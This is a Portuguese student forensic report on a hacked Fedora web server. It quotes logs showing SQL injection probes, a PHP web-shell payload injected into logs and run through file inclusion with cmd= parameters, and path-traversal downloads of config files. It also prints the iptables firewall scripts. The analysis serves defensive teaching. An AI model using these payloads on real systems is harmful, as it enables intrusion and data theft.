

Forensic analysis

Authors:

Tomás Costa - 89016

João Marques - 89234

Topics:

1. O que estava implementado a nível de confinamento de aplicações?
2. Qual a sequência de ações que o atacante tomou?
3. Que vulnerabilidades foram exploradas e como?
4. Que alterações foram realizadas e qual o propósito aparente?
5. Foram realmente realizadas transferências? Se sim, como e qual o conteúdo?
6. Porque é que a Firewall externa detetou transferências mas não detetou as restantes ações?

O que estava implementado a nível de confinamento de aplicações?

Ao analisar os logs de sistema da máquina (neste caso, analisamos na máquina referência) no ficheiro `syslog` não encontramos nenhuma implementação de um sistema de confinamento de aplicações.

Por outro lado, realizamos uma procura diretamente por aplicações de confinamento que esperássemos encontrar. Nesse sentido, encontramos:

- **AppArmor**: permite confinar programas a um conjunto limitado de recursos, com perfis carregados diretamente no *kernel*. Tem um modo de **enforcement**, no qual confina verdadeiramente a aplicação, e um modo **complain**, no qual apenas regista se uma aplicação violar o seu perfil.

```
root@vm /m/reference_root# grep -r "AppArmor"
Binary file usr/bin/setpriv matches
Binary file usr/bin/systemd-analyze matches
Binary file usr/bin/dbus-daemon matches
Binary file usr/lib/systemd/systemd matches
```

```
usr/share/doc/systemd/NEWS:      * A new unit file option AppArmorProfile= has been added to
usr/share/doc/systemd/NEWS:      set the AppArmor profile for the processes of a unit.
usr/share/doc/systemd/NEWS:      * Support for detecting the IMA and AppArmor security
usr/share/doc/systemd/NEWS:      this condition already supports SELinux and AppArmor we only
usr/share/doc/dbus/NEWS:• AppArmor integration has been merged, with features similar to the
usr/share/doc/dbus/NEWS:  Ubuntu's GetConnectionAppArmorSecurityContext method has been superseded
usr/share/doc/dbus/NEWS:• AppArmor integration requires libapparmor and optionally libaudit
usr/share/doc/dbus/NEWS:• Don't duplicate audit subsystem integration if AppArmor and SELinux are
usr/share/doc/dbus/NEWS:• Log audit events for AppArmor/SELinux policy violations whenever
usr/share/doc/dbus/NEWS:• On Linux, add support for AppArmor mediation of message sending and
usr/share/doc/dbus/NEWS: support), and eavesdropping (a new check, currently AppArmor-specific)
Binary file usr/share/locale/cs/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/da/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/de/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/es/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/fi/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/fr/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/ja/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/nl/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/pl/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/pt_BR/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/uk/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/vi/LC_MESSAGES/util-linux.mo matches
Binary file usr/share/locale/zh_CN/LC_MESSAGES/util-linux.mo matches
```

- **Docker:** permite criar um ambiente virtual no qual a aplicação está confinada a um sistema que apenas contém os serviços que precisa e apenas expõe os necessários. Pela análise do sys log, o *driver* foi inicializado, mas não sabemos ainda se foi usado no sistema.

```
root@vm /m/reference_root# grep -r "Docker"
etc/services:docker          2375/tcp          # Docker REST API (plain text)
etc/services:docker-s       2376/tcp          # Docker REST API (ssl)
Binary file etc/udev/hwdb.bin matches
Binary file var/lib/rpm/Packages matches
Binary file var/cache/dnf/packages.db matches
Binary file var/cache/dnf/updates.solv matches
Binary file var/cache/dnf/updates-filenames.solvx matches
Binary file var/cache/dnf/updates-presto.solvx matches
Binary file var/cache/dnf/updates-updateinfo.solvx matches
```

```

Binary file var/cache/dnf/fedora.solv matches
Binary file var/cache/dnf/fedora-filenames.solvx matches
Binary file usr/lib/systemd/systemd-pull matches
Binary file usr/lib/python3.4/site-packages/sos/plugins/__pycache__/docker.cpython-34.pyc matches
Binary file usr/lib/python3.4/site-packages/sos/plugins/__pycache__/docker.cpython-34.pyo matches
usr/lib/python3.4/site-packages/sos/plugins/docker.py:class Docker(Plugin, RedHatPlugin):
usr/lib/python3.4/site-packages/sos/plugins/docker.py:    """Docker information
usr/lib/python3.4/site-packages/sos/plugins/docker.py:class RedHatDocker(Plugin, RedHatPlugin):
usr/lib/udev/rules.d/85-nm-unmanaged.rules:# in another net namespace and managed by libvirt, Docker or
usr/lib/udev/hwdb.d/20-pci-vendor-model.hwdb: ID_MODEL_FROM_DATABASE=82557/8/9/0/1 Ethernet Pro 100 (PCI
usr/share/doc/curl/CHANGES: for Docker[4] which uses a special URL scheme (though the name contains
usr/share/doc/systemd/NEWS:      * Docker containers are now detected as a separate type of
usr/share/hwdata/pci.ids:      1179 0002 PCI FastEther LAN on Docker
usr/share/vim/vim74/filetype.vim:" Dockerfile
usr/share/vim/vim74/filetype.vim:au BufNewFile,BufRead Dockerfile      setf dockerfile
usr/share/vim/vim74/ftplugin/dockerfile.vim:" Language: Dockerfile
usr/share/vim/vim74/syntax/dockerfile.vim:" dockerfile.vim - Syntax highlighting for Dockerfiles

```

- **Chroot:** isola o processo num diretório que aparenta ser o *root* e impede que o mesmo acesse arquivos para os quais não tem permissão.

```

root@vm /m/reference_root# grep -r "Chroot"
etc/ssh/sshd_config:#ChrootDirectory none
Binary file var/cache/dnf/updates-filenames.solvx matches
Binary file usr/sbin/sshd matches
Binary file usr/lib64/librpm.so.7.0.0 matches
Binary file usr/lib64/httpd/modules/mod_unixd.so matches
usr/share/httpd/manual/mod/directives.html:<li><a href="mod_unixd.html#chrootdir">ChrootDir</a></li>
usr/share/httpd/manual/mod/mod_unixd.html:<li> <a href="#chroc
usr/share/httpd/manual/mod/mod_unixd.html:<div class="directive-section"><h2><a name="ChrootDir" id='
usr/share/httpd/manual/mod/mod_unixd.html:<tr><th><a href="directive-dict.html#Syntax">Syntax:</a></th><
usr/share/httpd/manual/mod/quickreference.html:<tr><td><a href="mod_unixd.html#chrootdir">ChrootDir
usr/share/vim/vim74/syntax/aptconf.vim: \ Build-Options Chroot-Directory ConfigurePending FlushSTDIN
usr/share/vim/vim74/syntax/sshdconfig.vim:syn keyword sshdconfigKeyword ChrootDirectory
Binary file usr/libexec/mysqld matches
Binary file srv/chroot-mariadb/usr/libexec/mysqld matches

```

Estas informações permitem-nos apenas concluir que estas aplicações estão presentes no sistema, não que estão a ser aplicadas. A ausência de *logs* relativos a estas aplicações no ficheiro *sys log* permite-nos assumir que não foram aplicadas no sistema em produção, apesar de instaladas.

No caso da aplicação **Chroot**, como verificamos a existência de ficheiros como *srv/chroot-mariadb/usr/libexec/mysqld*, assumimos que tenha sido aplicado confinamento à aplicação **MariaDB/MySQL**.

Verificámos, também, por análise de vários ficheiros, como explicado posteriormente, que os vários serviços estavam divididos entre diferentes utilizadores do sistema. Apesar de isto ser normal e o comportamento por defeito destas aplicações, produz certo nível de confinamento das aplicações.

Qual a sequência de ações que o atacante tomou?

Para determinar a sequência de ações do atacante, baseamo-nos na diferença entre os diretórios da máquina de referência e da máquina atacada:

```
Files reference_root/etc/httpd/logs/access_log and hacked_root/etc/httpd/logs/access_log differ
Files reference_root/etc/httpd/logs/error_log and hacked_root/etc/httpd/logs/error_log differ
Files reference_root/etc/httpd/logs/ssl_error_log and hacked_root/etc/httpd/logs/ssl_error_log differ
Files reference_root/etc/issue and hacked_root/etc/issue differ
Files reference_root/lib/issue and hacked_root/lib/issue differ
Files reference_root/lib/os.release.d/issue-fedora and hacked_root/lib/os.release.d/issue-fedora differ
Files reference_root/srv/chroot-mariadb/var/log/mariadb/mariadb.log and hacked_root/srv/chroot-mariadb/var/log/mariadb/mariadb.log differ
Only in hacked_root/srv/chroot-mariadb/var/tmp: x.txt
Files reference_root/usr/lib/issue and hacked_root/usr/lib/issue differ
Files reference_root/usr/lib/os.release.d/issue-fedora and hacked_root/usr/lib/os.release.d/issue-fedora differ
Files reference_root/var/cache/dnf/expired_repos.json and hacked_root/var/cache/dnf/expired_repos.json differ
Only in reference_root/var/cache/dnf/fedora-fe3d2f0c91e9b65c: metalink.xml
Only in reference_root/var/cache/dnf/fedora-fe3d2f0c91e9b65c/repodata: 0fa09bb5f82e4a04890b91255f4b34360e38e1
Only in reference_root/var/cache/dnf/fedora-fe3d2f0c91e9b65c/repodata: 86a9c4f451ecfec1633638a477b6acef805fd
Only in reference_root/var/cache/dnf/fedora-fe3d2f0c91e9b65c/repodata: 874f220caf48ccd307c203772c04b8550896c
Only in reference_root/var/cache/dnf/fedora-fe3d2f0c91e9b65c/repodata: repomd.xml
Only in reference_root/var/cache/dnf: fedora-filenames.solvx
Only in reference_root/var/cache/dnf: fedora.solv
Only in hacked_root/var/cache/dnf: metadata_lock.pid
Only in reference_root/var/cache/dnf/updates-e042e478e0621ea6: metalink.xml
Only in reference_root/var/cache/dnf/updates-e042e478e0621ea6/repodata: 01218690d29f35728973edd4587bfd73dbd6l
Only in reference_root/var/cache/dnf/updates-e042e478e0621ea6/repodata: 3d51dd4a9499400fc360d1112e5d7d52c5a5:
Only in reference_root/var/cache/dnf/updates-e042e478e0621ea6/repodata: 455209181fb97f3cdd54b73e729af34d238bl
```

Only in reference_root/var/cache/dnf/updates-e042e478e0621ea6/repodata: af3c46471b1d685f22c72a5e16d7383d333f1
Only in reference_root/var/cache/dnf/updates-e042e478e0621ea6/repodata: f0645865ea711dc4be0006e0fb110f5e24bfl
Only in reference_root/var/cache/dnf/updates-e042e478e0621ea6/repodata: repomd.xml
Only in reference_root/var/cache/dnf: updates-filenames.solvx
Only in reference_root/var/cache/dnf: updates-presto.solvx
Only in reference_root/var/cache/dnf: updates.solv
Only in reference_root/var/cache/dnf: updates-updateinfo.solvx
File reference_root/var/lib/gssproxy/default.sock is a socket while file hacked_root/var/lib/gssproxy/default.sock is a socket
Files reference_root/var/lib/mlocate/mlocate.db and hacked_root/var/lib/mlocate/mlocate.db differ
Only in reference_root/var/lib/NetworkManager: dhclient-4c619efa-fd8b-445d-a5dc-eec91932d461-enp0s3.lease
Only in hacked_root/var/lib/NetworkManager: dhclient-654f0ae0-663a-4ed2-bc13-5332c11742e6-enp0s3.lease
Only in hacked_root/var/lib/NetworkManager: dhclient-7625647c-766a-4ce2-87e2-b500b39e69ad-enp0s8.lease
Only in reference_root/var/lib/NetworkManager: dhclient-a98b76e8-8bef-4838-966b-6c9095e68d76-enp0s3.lease
Only in hacked_root/var/lib/NetworkManager: dhclient-ec763d29-5b76-4030-b343-61600bb2933e-enp0s3.lease
Files reference_root/var/lib/NetworkManager/timestamps and hacked_root/var/lib/NetworkManager/timestamps differ
Files reference_root/var/lib/rpm/__db.001 and hacked_root/var/lib/rpm/__db.001 differ
Files reference_root/var/lib/rpm/__db.002 and hacked_root/var/lib/rpm/__db.002 differ
Files reference_root/var/lib/rpm/__db.003 and hacked_root/var/lib/rpm/__db.003 differ
Files reference_root/var/lib/rsyslog/imjournal.state and hacked_root/var/lib/rsyslog/imjournal.state differ
Files reference_root/var/lib/systemd/random-seed and hacked_root/var/lib/systemd/random-seed differ
Files reference_root/var/log/audit/audit.log and hacked_root/var/log/audit/audit.log differ
Files reference_root/var/log/btmp and hacked_root/var/log/btmp differ
Files reference_root/var/log/cron and hacked_root/var/log/cron differ
Files reference_root/var/log/dnf.librepo.log and hacked_root/var/log/dnf.librepo.log differ
Files reference_root/var/log/dnf.log and hacked_root/var/log/dnf.log differ
Files reference_root/var/log/dnf.rpm.log and hacked_root/var/log/dnf.rpm.log differ
Files reference_root/var/log/hawkey.log and hacked_root/var/log/hawkey.log differ
Files reference_root/var/log/httpd/access_log and hacked_root/var/log/httpd/access_log differ
Files reference_root/var/log/httpd/error_log and hacked_root/var/log/httpd/error_log differ
Files reference_root/var/log/httpd/ssl_error_log and hacked_root/var/log/httpd/ssl_error_log differ
Files reference_root/var/log/journal/b74ff8c513354faa8633ee944bc76c73/system.journal and hacked_root/var/log/journal/b74ff8c513354faa8633ee944bc76c73/system.journal differ
Files reference_root/var/log/maillog and hacked_root/var/log/maillog differ
Files reference_root/var/log/mariadb/mariadb.log and hacked_root/var/log/mariadb/mariadb.log differ
Files reference_root/var/log/messages and hacked_root/var/log/messages differ
Files reference_root/var/log/secure and hacked_root/var/log/secure differ
Files reference_root/var/log/syslog and hacked_root/var/log/syslog differ
Files reference_root/var/log/wtmp and hacked_root/var/log/wtmp differ
Files reference_root/var/www/html/images/road.jpg and hacked_root/var/www/html/images/road.jpg differ
Only in hacked_root/var/www/html: r.php

Análise dos ficheiros diferentes

Por análise do ficheiro `etc/httpd/logs/access_log`, verificamos que o atacante começou por realizar vários ataques por SQL Injection, como por exemplo:

```
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2 HTTP/1.1" 200 -
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2 HTTP/1.1" 200 -
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=7511 HTTP/1.1" 200 -
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2.%27%28.%29%22%29%2C%28%29 HTTP/1.1" ;
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2%27vQDNvJ%3C%27%22%3EkZcIq HTTP/1.1"
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2%29%20AND%204107%3D3069%20AND%20%2839:
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2%20AND%207309%3D1070 HTTP/1.1" 200 -
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2%20AND%202497%3D1724--%20GrhU HTTP/1.:
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2%27%29%20AND%203989%3D8856%20AND%20%2{
192.168.56.1 - - [14/Dec/2019:01:38:18 +0000] "GET /products.php?type=2%27%20AND%207213%3D4313%20AND%20%27Ei"
```

Um dos principais e mais impactantes ataques foi induzido pela seguinte linha:

```
192.168.56.1 - - [14/Dec/2019:01:39:10 +0000] "GET /index.php?a=<?php system($_GET['cmd']);?> HTTP/1.1" 200 :
```

Esta injeção de código *PHP* permite criar uma **backdoor**, pela qual pode ser possível aceder a uma *shell* do sistema. Depois de criado o *backdoor*, o atacante descarregou um *script* e executou-o.

```
192.168.56.1 - - [14/Dec/2019:01:39:10 +0000] "GET /display.php?type=1&lang=/var/log/httpd/access_log&cmd=ls$
192.168.56.1 - - [14/Dec/2019:01:39:10 +0000] "GET /display.php?type=1&lang=/var/log/httpd/access_log&cmd=fi
192.168.56.1 - - [14/Dec/2019:01:39:10 +0000] "GET /display.php?type=1&lang=/var/log/httpd/access_log&cmd=fi
192.168.56.1 - - [14/Dec/2019:01:39:11 +0000] "GET /display.php?type=1&lang=/var/log/httpd/access_log&cmd=wg
192.168.56.1 - - [14/Dec/2019:01:39:11 +0000] "GET /display.php?type=1&lang=/var/log/httpd/access_log&cmd=fi
192.168.56.1 - - [14/Dec/2019:01:39:12 +0000] "GET /display.php?type=1&lang=/var/log/httpd/access_log&cmd=/o"
```

O atacante acedeu também a várias tabelas da base de dados, incluindo tabelas de sistema, e descarregou vários ficheiros de configuração, obtendo informação que lhe permitiu injetar o código referido.

Ao analisar o ficheiro `etc/httpd/logs/error_log` notamos que ocorreram vários erros causados por tentativas de acesso a vários ficheiros por parte do atacante que, sendo feitos pelo utilizador **Apache** a dados do utilizador **MySQL**, resultavam em erros de permissão de acesso.

No ficheiro `srv/chroot-mariadb/usr/libexec/mysqld` não encontramos nada anormal, pelo que assumimos que nada foi atacado nesta aplicação em particular.

Comprovámos também que, no diretório `srv/chroot-mariadb/var/tmp`, estava presente o ficheiro `x.txt`, que, conforme analisado em `etc/httpd/logs/access_log`, foi inserido:

```
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /details.php?prod=1%20union%20select%201,2,3,4,'hello'%20:
```

Ao analisar o ficheiro `var/log/secure` vimos que o atacante efectuou várias tentativas de login por **ssh** à *backdoor* criada anteriormente:

```
Dec 14 01:39:06 localhost sshd[1905]: Invalid user <?php system($_GET["cmd"]);?> from 192.168.56.1
Dec 14 01:39:06 localhost sshd[1905]: input_userauth_request: invalid user <?php system($_GET["cmd"]);?> [pre
Dec 14 01:39:08 localhost sshd[1905]: pam_unix(sshd:auth): check pass; user unknown
Dec 14 01:39:08 localhost sshd[1905]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty:
Dec 14 01:39:10 localhost sshd[1905]: Failed password for invalid user <?php system($_GET["cmd"]);?> from 19:
Dec 14 01:39:10 localhost sshd[1905]: error: maximum authentication attempts exceeded for invalid user <?php
Dec 14 01:39:10 localhost sshd[1905]: Disconnecting: Too many authentication failures [preauth]
```

Verificamos também que foi criado o ficheiro `/var/www/html/r.php`:

```
<?php
echo "Road Runner was here";
?>
```

Este ficheiro indica que o user conseguiu acesso a uma terminal, pois devido ao **Chroot** no servidor de base de dados, não era possível o user escrever ficheiros na pasta `var/html/www`, no entanto como vimos no exemplo em cima, o user conseguiu escrever nessa pasta.

Não encontramos, no entanto, nenhuma referência à criação deste ficheiro nos *logs*. Assumimos, assim, que o atacante ganhou acesso à máquina através do *backdoor* previamente mencionado e pôde apagar os logs que registaram os seus movimentos.

Que vulnerabilidades foram exploradas e como?

O atacante explorou a vulnerabilidade a **SQL Injection** no *PHP* que tinha sido reportada na auditoria realizada. Esta vulnerabilidade foi explorada de forma a **visualizar** e **descarregar** informação do sistema, assim como **inserir** outros dados e *scripts*.

Por outro lado, aproveitou a falta de **confinamento** das aplicações e explorou esta vulnerabilidade de forma a aceder a todo o sistema a partir da vulnerabilidade presente no servidor *Apache*.

Além disso, aproveitou o facto da máquina do servidor web ter um servidor **ssh** aberto com autenticação por password (vulnerável a ataques por *brute force*) e de o servidor da base de dados estar na mesma máquina.

Quais o atacante tentou explorar mas foram barradas?

Verificamos, principalmente por análise do ficheiro `etc/httpd/logs/error_log`, que o atacante tentou aproveitar as vulnerabilidades no *PHP* para aceder à base de dados e a outros dados de sistema, mas não conseguiu devido ao **confinamento** de cada serviço a um utilizador diferente e à limitação de **permissões** para cada ficheiro.

Também não foi possível inserir ficheiros e dados em determinados diretórios do sistema pela mesma razão.

Que alterações foram realizadas e qual o propósito aparente?

Uma das alterações principais foi realizada na pasta `var/www/html/images`, à imagem `road.jpg`. Esta nova versão da imagem contém uma mensagem escondida na imagem, algo denominado esteganografia. Ao dar decode da imagem usando uma [ferramenta](#), conseguimos extrair a mensagem no início da imagem que diz:

Parabéns!

<https://elearning.ua.pt/mod/assign/view.php?id=647250>

Esta alteração foi possível porque o utilizador descarregou um ficheiro pelo [link](#). Este script, que não conseguimos transferir, foi a arma do ataque e realizou as mudanças na imagem através de esteganografia. O link já não se encontra disponível e como o script foi colocado no diretório `/tmp/`, já não está presente no sistema.

Foram realmente realizadas transferências? Se sim, como e qual o conteúdo?

Sim foram realizadas transferências, o atacante deve ter notado que ao clicarmos no catálogo de carros, o método para descarregar ficheiros era através de um php denominado **downloads.php**, pelo que o user tentou aceder outros ficheiros através desse link e conseguiu com sucesso, visto que nao havia confinamento a nivel do diretório de downloads e ele pode voltar atras nos diretórios.

```
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=Brochure.pdf HTTP/1.1" 200 13305
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../index.php HTTP/1.1" 200 115
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../x.txt HTTP/1.1" 200 41
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../config.php HTTP/1.1" 200 130
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../display.php HTTP/1.1" 200 1557
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php HTTP/1.1" 200 41
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=Brochure.pdf HTTP/1.1" 200 13305
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../index.php HTTP/1.1" 200 115
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../x.txt HTTP/1.1" 200 41
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../config.php HTTP/1.1" 200 130
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../products.php HTTP/1.1" 200 117
192.168.56.1 - - [14/Dec/2019:01:39:04 +0000] "GET /download.php?item=../display.php HTTP/1.1" 200 1557
```

Apesar de as respostas terem sido todas de sucesso (200), nem todos os ficheiros foram transferidos, então analisamos no wireshark os ficheiros que o utilizador recebeu e chegamos a conclusão que ele transferiu todos exceto o ficheiro x.txt, visto que este não existia no sistema. E como conseguimos ver, o atacante conseguiu transferir alguns ficheiros criticos de sistema como **config.php** e **display.php** que lhe permitiram visualizar informação **crítica** do sistema.

Por outro lado, o atacante pode **visualizar** o nome e conteúdo de muitas tabelas da base de dados graças à vulnerabilidade a SQL Injection referida anteriormente.

Porque é que a Firewall externa detetou transferências mas nao detetou as restantes ações?

Ao pesquisarmos nos ficheiros do sistema, conseguimos encontrar dois ficheiros que são de extrema importancia, pois regem as configurações das firewalls.

```
user@vm:/mnt/hacked_root$ sudo cat root/shieldsup.sh
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
```

```
iptables -A INPUT -p icmp -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -j DROP
iptables -A FORWARD -j DROP
user@vm:/mnt/hacked_root$ sudo cat root/shieldsup.sh
[sudo] password for user:
iptables -A INPUT -j ACCEPT
iptables -A FORWARD -j ACCEPT
iptables --flush
```

Através da análise destas configurações do iptables, conseguimos perceber que a configuração inicial do `shieldsup.sh` aceita:

- Pacotes do tipo ICMP
- Pacotes vindo da interface `lo`
- Pacotes novos TCP ao porto 80 E recusa:
- Tudo o que não tiver sido declarado anteriormente, logo adotando uma politica de whitelisting.

Já o `shielddown.sh` parece aceitar todo o tipo de pacotes, daí o nome dos escudos estarem em baixo, pois a proteção oferecida foi retirada.

O facto de termos encontrado estes ficheiros na maquina do servidor web leva-nos a crer que, no sistema em produção, a máquina que actua como firewall externa é a mesma que o próprio servidor, o que potenciou o acesso descrito anteriormente sem qualquer controlo.

Ao analisar os pacotes capturados pela firewall, verificamos que, por exemplo, o ficheiro `steg_drop.py`, obtido através do comando `wget` a uma página externa, não foi detetado. Isto pode dever-se ao facto de a firewall não estar a implementar, efetivamente, uma defesa em perímetro, e assim passar por alto muito tráfego da máquina para outros sites. Portanto, outro tráfego criado pelo atacante para outras ações pode facilmente não ter sido detetado.

Suspeitamos que o atacante tenha inicialmente realizado transferências e daí as podermos visualizar no tráfego da firewall externa.

No entanto, tendo criada a **backdoor**, o user ganhou acesso ao sistema por completo, executando comandos numa sessão `ssh` encriptada e, portanto, impossível de analisar pela firewall. Por outro lado, pôde remover as limitações da firewall uma vez dentro da máquina.